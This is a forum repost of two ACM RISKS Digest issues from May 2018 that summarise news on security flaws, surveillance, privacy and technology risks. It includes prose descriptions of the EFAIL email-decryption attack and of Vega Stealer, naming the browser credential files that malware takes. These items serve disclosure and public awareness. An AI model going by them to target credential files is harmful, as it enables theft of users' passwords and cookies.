    Subject: Intel Documentation Blamed for Multiple Operating System Security
    Flaws (IT Pro)

    Anybody who's been involved with tech for a while has most likely come
    across the expression "RTFM" on more than one occasion. Usually delivered
    with a degree of snark, if not downright hostility, the initialism stands
    for "read the ... manual," with an added expletive added for good
    measure. As is often pointed out, the advice is not only rude, it's also
    often not helpful. Sometimes there is no documentation to read and if there
    is, it's poorly written and difficult to understand.

    The latter seems to be the case with CVE-2018-8897, the latest operating
    system vulnerability.

    On May 8, Nick Peterson of Everdox Tech and Nemanja Mulasmajic of
    triplefault.io, made public a research paper that revealed all major
    operating systems -- Linux, Apple, Windows and BSD -- to be affected by a
    flaw that can allow authenticated users to read data in memory or control
    low-level OS functions. The good news is that the researchers notified
    software developers of the problem on April 30, and by the time it was made
    public, patches were at the ready.

    http://www.itprotoday.com/endpoint-...lamed-multiple-operating-system-security-flaw

    ------------------------------

    Date: Tue, 15 May 2018 17:52:40 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Problem with Chinese GPS (Now I Know)

    If you're in a foreign country and try to read a map, you may find it
    difficult -- unless your host nation's language is the same as your home
    nation's, the words are going to be different and, assuming you're not
    bilingual, will require some translation. But the locations of the roads,
    rivers, buildings, and the like should be the same, regardless of whether
    the map is in English, Spanish, or Chinese, right? Language aside, Google
    Maps should work the same everywhere, right?

    Well, no.

    http://nowiknow.com/the-problem-with-chinese-gps/

    ------------------------------

    Date: Tue, 15 May 2018 19:06:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: U.S. identifies suspect in major leak of CIA hacking tools (WashPo)

    The former agency employee is being held in a Manhattan jail on unrelated
    charges.

    http://www.washingtonpost.com/world...5ef3f8-5865-11e8-8836-a4a123c359ab_story.html

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.69
    ************************
  3. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    Joined:
    Apr 3, 2007
    Messages:
    4,340
    Likes Received:
    300
    Trophy Points:
    258
    Location:
    Tampa
    Ratings Received:
    +2,180
    Risks Digest 30.70

    RISKS List Owner

    May 26, 2018 7:09 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 26 May 2018 Volume 30 : Issue 70

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)
    Don't Put That in My Heart Until You're Sure It Really Works (NYT)
    "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)
    "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)
    Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)
    "This cryptocurrency phishing attack uses new trick to drain wallets"
    (Danny Palmer)
    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)
    ICE abandons its dream of ‘extreme vetting’ software that could
    E-Mail Clients are Insecure, PGP and S/MIME 100% secure
    E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)
    "Senator wants to know how police can locate any phone in seconds without
    a warrant" (Zach Whittaker)
    US cell carriers are selling access to your real-time phone location data
    (Zach Whittaker)
    Hundreds of Apps Can Empower Stalkers to Track Their Victims (NYTimes)
    "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into
    secret eavesdroppers" (CSO Online)
    So, Umm, Google Duplex's Chatter Is Not Quite Human (Scientific American)
    Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence (The Wrap)
    Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)
    Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)
    Most GDPR emails unnecessary and some illegal, say experts (The Guardian)
    The Pentagon Has a Big Plan to Solve Identity Verification in Two Years
    (Defense One)
    Unplug Your Echo! (Ars Technica)
    FBI dramatically overstates how many phones they can't get into (WaPo)
    "Google to remove "secure" indicator from HTTPS pages on Chrome" (ZDNet)
    Google's Selfish Ledger is an unsettling vision of Silicon Valley social
    engineering (The Verge)
    "A flaw in a connected alarm system exposed vehicles to remote hacking"
    (ZDNet)
    Syrian hackers who tricked reporters indicted (WashPo)
    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    (ZDNet)
    Is technology bringing history to life or distorting it? (WashPo)
    Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)
    Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)
    The surprising return of the repo man (WashPo)
    Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)
    Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to Win
    Election (NY Times)
    Re: Securing Elections (Mark E. Smith)
    Re: Dark code (Kelly Bert Manning, Richard O'Keefe)
    Fitness App Leads To Arrest For Attack On McLean Cyclist (McLean VA Patch)
    Man Is Charged With Hacking West Point and Government Websites (NYT)
    Fake Facebook accounts and online lies multiply in hours after Santa Fe
    school shooting (WashPo)
    Re: "Warning: Dangerous Fake Emails About Google Privacy Changes" (Wol)
    Re: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (Yooly)
    Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    Re: Chinese GPS (Dimitri Maziuk)
    Re: The risk from robot weapons (Amos Shapir)
    Will You Be My Emergency Contact Takes On a Whole New Meaning (NYT)
    This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)
    As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 22 May 2018 09:31:51 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)

    Boy, 9, dies in accident involving motorized room partition at his Fairfax school

    ------------------------------

    Date: Mon, 21 May 2018 19:30:25 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Don't Put That in My Heart Until You're Sure It Really Works
    (NYTimes)

    Opinion | Don’t Put That in My Heart Until You’re Sure It Really Works

    'The bar for approval of medical devices is too low. There is no reason we
    shouldn’t require, as we almost always do for drugs, a randomized
    placebo-controlled trial showing improvements in “hard” outcomes like
    mortality before approving them.

    'Unfortunately, the United States may soon make it even easier for medical
    devices to reach the patient’s bedside. The Food and Drug Administration is
    considering requiring less upfront research and instead adding increased
    oversight after a device has been introduced into the market. The argument
    is that this will spur technological innovation and perhaps help terminally
    ill patients. However, loosening regulations could extract a steep cost from
    patients and the health system.'

    Greater release frequency with less rigorous pre-production qualification
    criteria and test coverage is NOT a recipe for safe and viable embedded
    software stacks that drive these gizmos. Suppressing production defect
    escape potential is challenging. Proactive techniques that facilitate early
    and rapid software defect discovery capability -- such as continuous
    integration and high-speed regression -- are effective when capable test
    authors challenge software stack authors. Alas, industry (not just embedded
    medical implants, cars, cellphones, etc.) often economize on qualification
    product life cycle stages. There are "too many bits" to test quickly and
    thoroughly. Governance decisions and gut judgment is sometimes applied with
    impunity.

    It appears that the FDA has gone rogue, and off-the-rails via regulatory
    capture. A business-friendly administration promoting "caveat emptor" as
    standard operating procedure also intensifies medical device implantation
    risks. Refer to "The Danger Within Us: America's Untested, Unregulated
    Medical Device Industry and One Man's Battle to Survive It" by Jeanne Lenzer
    for an expose' of the implantable medical device industry.

    If you are confronted with a "hard sell" to "go" for implantation, ask
    a few questions of your physician and the device salesperson:

    Are there any randomized control trials and non-industry funded studies that
    evaluate the candidate device's effectiveness in humans? Were the studies
    performed by a non-profit? Or a university? Does the entity reporting the
    study's results receive funding from the device manufacturer? Do any of the
    study's authors disclose industry ties? If so, a report that is published
    might possess skewed findings. Is the raw data from these studies available
    for inspection? If so, try to find a consultant to review it for you and
    render an opinion. Will the device manufacturer share their software and
    system test plans for inspection? If so, try to locate a person "skilled in
    the art of embedded software test" to evaluate the test plan, and the
    firmware test results released with the implanted device. Try to gain access
    to the manufacturer's defect tracking system to explore defect density and
    discovery rates and repair history.

    Does the device have a special mechanism to disable it, should it misbehave?
    If so, try to learn about how this is accomplished and ensure there are
    backup sources -- other physicians or facilities that possess this
    mechanism.

    How many implants have been performed in the past year? How many
    patient deaths occurred post-implantation? Never mind if the deaths
    were attributed to the device or not, find the raw count of deaths.

    For each post-implant death, was an FDA MAUDE report filed? How many of
    these reports where filed by medical practitioners? How many by the device
    manufacturer? Confront the salesperson to learn why, or if, there's a huge
    discrepancy between the number of deaths and the number of FDA MAUDE reports
    they or practitioners reported. That discrepancy is apparently a clue that
    the manufacturer is or has concealed important evidence about device
    capability or side-effects that can injure or kill you.

    Has the device been the subject of prior recalls? If so, why? Has the
    manufacturer been sued for product liability previously? Are they currently
    under litigation for liability? These questions can provide insight into
    their organization's maturity and ability to pro-actively act on
    lessons-learned.

    Is the device implantation under consideration being applied for "an
    off-label" application in your case? If so, why?

    ------------------------------

    Date: Fri, 18 May 2018 09:24:59 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)

    Liam Tung | 18 May 2018
    Ex-Intel security expert: This new Spectre attack can even reveal firmware secrets | ZDNet

    Ex-Intel security expert: This new Spectre attack can even reveal firmware
    secrets; A new variant of Spectre can expose the contents of memory that
    normally can't be accessed by the OS kernel.

    opening text:

    Yuriy Bulygin, the former head of Intel's advanced threat team, has
    published research showing that the Spectre CPU flaws can be used to break
    into the highly privileged CPU mode on Intel x86 systems known as System
    Management Mode (SMM).

    ------------------------------

    Date: Wed, 16 May 2018 09:11:51 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)

    This malware is harvesting saved credentials in Chrome, Firefox browsers | ZDNet

    This malware is harvesting saved credentials in Chrome, Firefox browsers
    Researchers say the new Vega Stealer malware is currently being used
    in a simple campaign but has the potential to go much further.
    By Charlie Osborne for Zero Day | May 14, 2018 -- 07:42 GMT (00:42
    PDT) | Topic: Security

    selected text:

    Vega Stealer is also written in .NET and focuses on the theft of
    saved credentials and payment information in Google Chrome. These
    credentials include passwords, saved credit cards, profiles, and cookies.

    When the Firefox browser is in use, the malware harvests specific
    files -- "key3.db" "key4.db", "logins.json", and "cookies.sqlite" --
    which store various passwords and keys.

    However, Vega Stealer does not wrap up there. The malware also takes
    a screenshot of the infected machine and scans for any files on the
    system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for
    exfiltration.

    According to the security researchers, the malware is currently being
    utilized to target businesses in marketing, advertising, public
    relations, retail, and manufacturing.

    ------------------------------

    Date: Wed, 23 May 2018 18:07:03 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)

    Charlie Osborne for Zero Day | 22 May 2018
    Student awarded $36,000 for remote execution flaw in Google App Engine | ZDNet
    The discovery was made by a university student who was not aware of
    how dangerous the vulnerability was.

    opening text:

    Google has awarded a young cybersecurity researcher $36,337 for disclosing a
    severe vulnerability in the Google App Engine.

    The 18-year-old student from Uruguay's University of the Republic discovered
    a critical remote code execution (RCE) bug in the system, which is a
    framework and cloud platform used for the hosting and development of web
    applications in Google data centers.

    ------------------------------

    Date: Fri, 18 May 2018 09:05:54 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "This cryptocurrency phishing attack uses new trick to drain
    wallets" (Danny Palmer)

    Danny Palmer | 17 May 2018
    This cryptocurrency phishing attack uses new trick to drain wallets | ZDNet

    This cryptocurrency phishing attack uses new trick to drain wallets
    Campaign uses automation to empty cryptocurrency wallets and produce
    lucrative returns.

    ... the phishing campaign mimics the front end of the MyEtherWallet website
    for the purpose of stealing credentials, while also deploying what the
    authors call an "automated transfer system" to process the details captured
    by the fake page and transfer funds.

    The attack injects scripts into active web sessions and silently and
    invisibly executes bank transfers just seconds after the user logs
    into their cryptocurrency account.

    Researchers note that MyEtherWallet is an appealing target for attackers
    because it is simple to use, but its lack of security compared to other
    banks and exchanges make it a prominent target for attack.

    After that, the crooks look to drain accounts when the victim decrypts their
    wallet. The scam uses scripts which automatically create the fund transfer
    by pressing the buttons like a legitimate user would, all while the activity
    remains hidden -- it's the first time an attack has been seen to use this
    automated tactic.

    ------------------------------

    Date: Wed, 16 May 2018 16:47:10 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)

    Baldet, who most recently served as the bank’s blockchain program lead, is
    cofounding a new startup, Clovyr, that aims to help consumers, developers,
    and businesses explore the nascent, albeit burgeoning, world of
    blockchain-based, decentralized technologies, she tells Fortune. She is
    joined by Nielsen, former lead developer of Quorum, a JPMorgan Chase-built
    blockchain for business, who will serve as the concern’s chief technologist.

    Baldet unveiled a Clovyr demo at the Consensus conference in Manhattan on
    Monday afternoon. The company is in the process of fundraising.

    Clovyr's product, now under development, is slated to take the form of
    something akin to an app store, where people and businesses can experiment
    with a multitude of decentralized apps and services, developer toolsets, and
    underlying distributed ledgers. The cofounders envision the platform serving
    as a neutral ground, offering a browser-like dashboard for the
    blockchain-curious, through which Clovyr can provide support and other
    services to customers according to their needs.

    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup

    Just what consumers need. What could go wrong? Also, what's with "Clovyr"
    name?

    ------------------------------

    Date: Thu, 17 May 2018 16:48:50 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: ICE abandons its dream of ‘extreme vetting’ software that could
    predict whether a foreign visitor would become a terrorist (WashPo)

    Immigration officials originally wanted artificial intelligence that could
    continuously track foreign visitors' social media. They're giving the job to
    humans instead.

    ICE just abandoned its dream of ‘extreme vetting’ software that could predict whether a foreign visitor would become a terrorist

    ------------------------------

    Date: Thu, 17 May 2018 15:10:11 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: E-Mail Clients are Insecure, PGP and S/MIME 100% secure

    There is no "security" problem with either PGP or S/MIME encrypted and
    signed messages. The problem is, as it has been since the introduction of
    the ability to embed executable code into e-mail messages (aka, Web Pages
    and Rich Text via SMTP), the shoddy and useless security state of almost all
    e-mail clients.

    If you turn off the [expletive deleted] (HTML code execution, etc) then
    there is no problem. In other words, the only problem that exists is that
    which you created yourself. So if you do something utterly stupid, you
    deserve whatever you get in return.

    ------------------------------

    Date: Mon, 14 May 2018 15:06:45 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)

    Throughout the many arguments over encrypted communications, there has been
    at least one constant: the venerable tools for strong email encryption are
    trustworthy. That may no longer be true.

    On Tuesday, well-credentialed cybersecurity researchers will detail what
    they call critical vulnerabilities in widely-used tools for applying PGP/GPG
    and S/MIME encryption. According to Sebastian Schinzel, a professor at the
    Münster University of Applied Sciences in Germany, the flaws could reveal
    the plaintext that email encryption is supposed to cover up -- in both
    current and old emails.

    The researchers are advising everyone to temporarily stop using plugins for
    mail clients like Microsoft Outlook and Apple Mail that automatically
    encrypt and decrypt emails -- at least until someone figures out how to
    remedy the situation. Instead, experts say, people should switch to tools
    like Signal, the encrypted messaging app that's bankrolled by WhatsApp
    co-founder Brian Acton.

    Stop Using Common Email Encryption Tools Immediately, Researchers Warn

    ------------------------------

    Date: Tue, May 15, 2018 at 12:38 AM
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (EFF)

    Erica Portnoy, Danny O'Brien, and Nate Cardozo, EFF, 14 May 2018
    http://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0

    Don't panic! But you should stop using PGP for encrypted email and switch
    to a different secure communications method for now.

    A group of researchers released a paper today that describes a new class of
    serious vulnerabilities in PGP (including GPG), the most popular email
    encryption standard. The new paper includes a proof-of-concept exploit that
    can allow an attacker to use the victim's own email client to decrypt
    previously acquired messages and return the decrypted content to the
    attacker without alerting the victim. The proof of concept is only one
    implementation of this new type of attack, and variants may follow in the
    coming days.

    Because of the straightforward nature of the proof of concept, the severity
    of these security vulnerabilities, the range of email clients and plugins
    affected, and the high level of protection that PGP users need and expect,
    EFF is advising PGP users to pause in their use of the tool and seek other
    modes of secure end-to-end communication for now.

    Because we are awaiting the response from the security community of the
    flaws highlighted in the paper, we recommend that for now you uninstall or
    disable your PGP email plug-in. These steps are intended as a temporary,
    conservative stopgap until the immediate risk of the exploit has passed and
    been mitigated against by the wider community. There may be simpler
    mitigations available soon, as vendors and commentators develop narrower
    solutions, but this is the safest stance to take for now. Because sending
    PGP-encrypted emails to an unpatched client will create adverse ecosystem
    incentives to open incoming emails, any of which could be maliciously
    crafted to expose ciphertext to attackers.

    While you may not be directly affected, the other participants in your
    encrypted conversations are likely to be. For this attack, it isn't
    important whether the sender or the receiver of the original secret message
    is targeted. This is because a PGP message is encrypted to both of their
    keys.

    At EFF, we have relied on PGP extensively both internally and to secure
    much of our external-facing email communications. Because of the severity
    of the vulnerabilities disclosed today, we are temporarily dialing down our
    use of PGP for both internal and external email.

    Our recommendations may change as new information becomes available, and we
    will update this post when that happens.

    How The Vulnerabilities Work

    PGP, which stands for Pretty Good Privacy, was first released nearly 27
    years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP
    transformed the level of privacy protection available for digital
    communications, and has provided tech-savvy users with the ability to
    encrypt files and send secure email to people they've never met. Its strong
    security has protected the messages of journalists, whistleblowers,
    dissidents, and human rights defenders for decades. While PGP is now a
    privately-owned tool, an open source implementation called GNU Privacy
    Guard (GPG) has been widely adopted by the security community in a number
    of contexts, and is described in the OpenPGP Internet standards document.

    The paper describes a series of vulnerabilities that all have in common
    their ability to expose email contents to an attacker when the target opens
    a maliciously crafted email sent to them by the attacker. In these attacks,
    the attacker has obtained a copy of an encrypted message, but was unable to
    decrypt it.

    The first attack is a direct exfiltration attack that is caused by the
    details of how mail clients choose to display HTML to the user. The
    attacker crafts a message that includes the old encrypted message. The
    new message is constructed in such a way that the mail software
    displays the entire decrypted message -- including the captured
    ciphertext -- as unencrypted text. Then the email client's HTML parser
    immediately sends or exfiltrates the decrypted message to a server
    that the attacker controls.

    The second attack abuses the underspecification of certain details in the
    OpenPGP standard to exfiltrate email contents to the attacker by modifying
    a previously captured ciphertext. Here are some technical details of the
    vulnerability, in plain-as-possible language:

    When you encrypt a message to someone else, it scrambles the information
    into ciphertext such that only the recipient can transform it back into
    readable plaintext. But with some encryption algorithms, an attacker can
    modify the ciphertext, and the rest of the message will still decrypt back
    into the correct plaintext. This property is called malleability. This
    means that they can change the message that you read, even if they can't
    read it themselves.

    To address the problem of malleability, modern encryption algorithms add
    mechanisms to ensure integrity, or the property that assures the recipient
    that the message hasn't been tampered with. But the OpenPGP standard says
    that it's ok to send a message that doesn't come with an integrity check.
    And worse, even if the message does come with an integrity check, there are
    known ways to strip off that check. Plus, the standard doesn't say what to
    do when the check fails, so some email clients just tell you that the check
    failed, but show you the message anyway. ...

    http://dewaynenet.wordpress.com/feed/

    ------------------------------

    Date: Thu, 24 May 2018 18:24:24 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 24 May 2018

    http://www.zdnet.com/article/tmobile-bug-let-anyone-see-any-customers-account-details/

    T-Mobile bug let anyone see any customer's account details Exclusive: The
    exposed lookup tool let anyone run a customer's phone number -- and obtain
    their home address and account PIN, used to contact phone support.

    selected text:

    A bug in T-Mobile's website let anyone access the personal account details
    of any customer with just their cell phone number.

    The flaw, since fixed, could have been exploited by anyone who knew where to
    look -- a little-known T-Mobile subdomain that staff use as a customer care
    portal to access the company's internal tools.

    Although the API is understood to be used by T-Mobile staff to look up
    account details, it wasn't protected with a password and could be easily
    used by anyone.

    The returned data included a customer's full name, postal address, billing
    account number, and in some cases information about tax identification
    numbers. The data also included customers' account information, such as if
    a bill is past-due or if the customer had their service suspended.

    The data also included references to account PINs used by customers as a
    security question when contacting phone support. Anyone could use that
    information to hijack accounts.

    [Gene also contributed a previous item from Zack Whittaker om 17 May
    on the same subject:
    http://www.zdnet.com/article/cell-p...ed-millions-of-americans-real-time-locations/
    I think the more recent one suffices here. PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:27:33 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Senator wants to know how police can locate any phone in
    seconds without a warrant" (Zach Whittaker)

    Zack Whittaker for Zero Day | May 11, 2018
    http://www.zdnet.com/article/securus-police-cell-phones-warrantless-tracking/

    Senator wants to know how police can locate any phone in seconds without a
    warrant. Real-time location data was accessible by police under "the legal
    equivalent of a pinky promise," said a senator who is demanding that the FCC
    investigate why a company, contracted to monitor calls of prison inmates,
    also allows police to track phones of anyone in the US without a warrant.

    The bombshell story in *The New York Times& revealed Securus, a Texas-based
    prison technology company, could track any phone "within seconds" by
    obtaining data from cellular giants -- including AT&T, Sprint, T-Mobile, and
    Verizon -- typically reserved for marketers.

    ------------------------------

    Date: Fri, 18 May 2018 09:29:13 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "US cell carriers are selling access to your real-time phone
    location data" (Zach Whittaker)

    Zack Whittaker, Zero Day, 14 May 2018
    http://www.zdnet.com/article/us-cell-carriers-selling-access-to-real-time-location-data/

    US cell carriers are selling access to your real-time phone location data
    The company embroiled in a privacy row has "direct connections" to all major
    US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint -- and
    Canadian cell networks, too.

    Four of the largest cell giants in the US are selling your real-time
    location data to a company that you've probably never heard about before.

    In case you missed it, a senator last week sent a letter demanding the
    Federal Communications Commission (FCC) investigate why Securus, a prison
    technology company, can track any phone "within seconds" by using data
    obtained from the country's largest cell giants, including AT&T, Verizon,
    T-Mobile, and Sprint, through an intermediary, LocationSmart.

    ------------------------------

    Date: Sat, 19 May 2018 07:36:23 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Hundreds of Apps Can Empower Stalkers to Track Their Victims
    (The New York Times)

    http://mobile.nytimes.com/2018/05/19/technology/phone-apps-stalking.html

    'KidGuard is a phone app that markets itself as a tool for keeping tabs on
    children. But it has also promoted its surveillance for other purposes and
    run blog posts with headlines like *How to Read Deleted Texts on Your
    Lover's Phone.*

    'A similar app, mSpy, offered advice to a woman on secretly monitoring her
    husband. Still another, Spyzie, ran ads on Google alongside results for
    search terms like *catch cheating girlfriend iPhone*.

    'As digital tools that gather cellphone data for tracking children,
    friends or lost phones have multiplied in recent years, so have the
    options for people who abuse the technology to track others without
    consent.'

    Surveillance capitalism is booming. These apps are e^(to the creepy).

    ------------------------------

    Date: Fri, 18 May 2018 15:06:20 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home
    into secret eavesdroppers" (CSO Online)

    http://www.csoonline.com/article/32...xa-google-home-into-secret-eavesdroppers.html

    Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into secret
    eavesdroppers. Researchers devise new two new attacks -- voice squatting
    and voice masquerading -- on Amazon Alexa and Google Home, allowing
    adversaries to steal personal information or silently eavesdrop.

    Ms. Smith, CSO | 17 May 2018

    Ms. Smith (not her real name) is a freelance writer and programmer with a
    special and somewhat personal interest in IT privacy and security issues.

    opening text:

    Oh, goody, Amazon Alexa and/or Google Home could be hit with remote,
    large-scale "voice squatting" and "voice masquerading" attacks to steal
    sensitive user information or eavesdrop on conversations.

    ------------------------------

    Date: Fri, 18 May 2018 17:56:12 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: So, Umm, Google Duplex's Chatter Is Not Quite Human
    (Scientific American)

    http://www.scientificamerican.com/article/so-umm-google-duplexs-chatter-is-not-quite-human/

    "Google’s Duplex voice assistant drew applause last week at the company’s
    annual I/O developer conference after CEO Sundar Pichai demonstrated the
    artificially intelligent technology autonomously booking a hair salon
    appointment and a restaurant reservation, apparently fooling the people
    who took the calls. But enthusiasm has since been tempered with unease
    over the ethics of a computer making phone calls under the guise of being
    human. Such a mixed reception has become increasingly common for Google,
    Amazon, Facebook and other tech companies as they push AI's boundaries in
    ways that do not always seem to consider consumer privacy or safety
    concerns."

    ------------------------------

    Date: Fri, 18 May 2018 08:27:18 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence
    (The Wrap)

    via NNSquad
    http://www.thewrap.com/henry-kissinger-is-scared-of-unstable-artificial-intelligence/

    The former U.S. secretary of state is warning against the threat of
    "unstable" artificial intelligence in a new essay in The Atlantic --
    fearing the rapid rise of machines could lead to questions humanity is not
    ready to tackle.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:25 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)

    http://www.nytimes.com/2018/05/10/technology/cellphone-tracking-law-enforcement.html

    A company catering to law enforcement and corrections officers has raised
    privacy concerns with a product that can locate almost anyone's cellphone
    across the United States.

    ------------------------------

    Date: Fri, 18 May 2018 17:53:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)

    http://www.scientificamerican.com/article/gunshot-sensors-pinpoint-destructive-fish-bombs/

    "Rogue fishers around the world toss explosives into the sea and scoop up
    bucketloads of stunned or dead fish, an illegal practice in many nations
    that can destroy coral reefs and wreak havoc on marine biodiversity.
    Catching perpetrators amid the vastness of the ocean has long proved
    almost impossible, but researchers working in Malaysia have now adapted
    acoustic sensors—originally used to locate urban gunfire—to pinpoint these
    marine blasts within tens of meters."

    Example of dual-use technology for public and environmental safety
    maintenance.

    ------------------------------

    Date: Mon, 21 May 2018 12:04:35 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Most GDPR emails unnecessary and some illegal, say experts
    (The Guardian)

    NNSquad
    http://www.theguardian.com/technolo...cessary-and-in-some-cases-illegal-say-experts

    The vast majority of emails flooding inboxes across Europe from companies
    asking for consent to keep recipients on their mailing list are
    unnecessary and some may be illegal, privacy experts have said, as new
    rules over data privacy come into force at the end of this week.

    AND EVEN WORSE: "Warning: New European Privacy Law Has Become a
    Jackpot for Internet Crooks" -

    http://lauren.vortex.com/2018/05/01...-law-has-become-a-jackpot-for-internet-crooks

    ------------------------------

    Date: Wed, 23 May 2018 13:58:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Pentagon Has a Big Plan to Solve Identity Verification in
    Two Years (Defense One)

    The plan grew out of efforts to modernize the Defense Department's ID cards.

    The Defense Department is funding a project that officials say could
    revolutionize the way companies, federal agencies and the military itself
    verify that people are who they say they are and it could be available in
    most commercial smartphones within two years.

    The technology, which will be embedded in smartphones’ hardware, will
    analyze a variety of identifiers that are unique to an individual, such as
    the hand pressure and wrist tension when the person holds a smartphone and
    the person’s peculiar gait while walking, said Steve Wallace, technical
    director at the Defense Information Systems Agency.

    Organizations that use the tool can combine those identifiers to give the
    phone holder a “risk score,” Wallace said. If the risk score is low enough,
    the organization can presume the person is who she says she is and grant her
    access to sensitive files on the phone or on a connected computer or grant
    her access to a secure facility. If the score’s too high, she’ll be locked
    out.

    http://www.defenseone.com/technolog...solve-identity-verification-two-years/148280/

    ------------------------------

    Date: Thu, 24 May 2018 17:41:32 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Unplug Your Echo! (Ars Technica)

    [Thanks to Phil Porras]
